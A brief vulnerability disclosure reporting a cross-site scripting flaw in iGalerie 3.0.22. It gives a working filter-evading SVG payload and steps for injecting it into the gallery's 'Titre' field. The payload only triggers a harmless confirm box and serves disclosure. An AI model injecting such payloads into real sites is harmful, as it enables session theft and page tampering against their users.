iGalerie version 3.0.22 suffers from a cross site scripting vulnerability.
# Exploit Title: iGalerie Version: 3.0.22 - Reflected XSS
# Date: 2024-7-1
# Exploit Author: tmrswrr
# Vendor Homepage: https://www.igalerie.org/
# Version: 3.0.22
# Tested on: https://softaculous.com/demos/iGalerie
1 ) Go to home page and click edit > https://127.0.0.1/iGalerie/
Titre : "><sVg/onLy=1 onLoaD=confirm(1)//
2 ) Write in titre your payload , after save will be see alert button.